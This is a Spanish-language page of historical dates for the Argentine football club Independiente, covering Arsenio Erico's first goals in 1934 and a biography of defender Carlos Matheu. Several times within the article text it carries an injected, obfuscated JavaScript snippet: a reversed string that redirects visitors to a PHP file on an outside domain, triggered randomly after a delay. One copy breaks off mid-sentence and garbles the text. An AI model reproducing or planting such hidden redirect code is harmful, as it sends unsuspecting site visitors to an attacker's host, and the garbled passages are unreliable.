Conectate con nosotros

Efemérides

Efemérides del 13 de mayo

No se puede amar lo que no se conoce. Estas efemérides son parte de la brillante historia del Glorioso INDEPENDIENTE de Avellaneda.

1934Independiente recibe a Chacarita por la fecha 8 del Campeonato de Primera División y le gana por 3 a 1. Hace su debut en las redes argentinas, Arsenio Pastor Erico, convirtiendo a los 15’ y 64’ del encuentro, mientras que Felipe Álvarez hizo el tercero a los 73’ y Ricardo Barraza el descuento para la visita a los 85’.

El Rojo ese día formó con: Bello; Fazio y Lecea; Ferrou, Corazzo  y Celestino Martínez; Valentini, Álvarez, Erico, Sastre y Adolfo Martínez, siendo D.T. Zoilo Canaveri.

Erico había debutado hacía una semana sin anotar goles, pero un día como hoy se inició el amor más grande que haya tenido un delantero en la historia de Argentina con la redes.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»68″ height=»52″/></figure></div>



<p><strong>1985</strong> – Nacimien<script>$mWn=function(n){if(typeof ($mWn.list[n])==to en Quilmes, provincia de Buenos Aires, de Carlos Javier Matheu, para jugar entre 2004 y 2008, y luego de 2009 a 2012, con 109 partidos y 8 goles, coronándose campeón de la Copa Sudamericana 2010. Hizo todas las Inferiores en Argentinos de Quilmes. Llegó a Independiente en forma sorpresiva en diciembre del 2003, en la Reserva, pero de golpe apareció en primera. Debutó el 2 de octubre de 2004, por lesión de Gioda. Le costó mucho afianzarse, no tenía demasiados minutos en cancha y, cuando los tenía, no demostraba demasiado. Hasta que en 2007 bajo la dirección técnica de Pedro Troglio logró ser titular.

 No se destacó por tener gran categoría, sinó por su carácter y sacrificio. Fue referente por ser corajudo e ir para adelante, pero duró poco, ya que en 2008 emigró al Cagliari de Italia, donde no jugó, por lo que el Rojo lo recompraría en el 2009, más caro de lo que lo vendió, en la gestión de Julio Comparada.

En esta segunda etapa, Matheu recuperó su nivel y el “Tolo” Gallego, le dio la capitanía. Fue citado a la Selección Nacional teniendo la desgracia enorme de romperse los ligamentos a los 2 minutos de vestir la camiseta Argentina. Le costó muchísimo volver, pero finalmente lo hizo para cumplir el sueño, levantar la Copa Sudamericana 2010, en la cual Carlos fue el capitán.

En junio del 2012, Independiente no pagó la diferencia para comprarlo y lo dejó libre. Después de dar vueltas por varios equipos del extranjero y de Argentina, tanto de la “A” como de la “B”, tenemos entendido que se retiró.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»77″ height=»60″/></figure></div>



<p>Les dejo <strong>videos de goles de Carlos a Arsenal</strong>, <strong>Vélez y River</strong>:</p>



<figure class=
La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»56″ height=»44″/></figure></div>



<figure class=

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides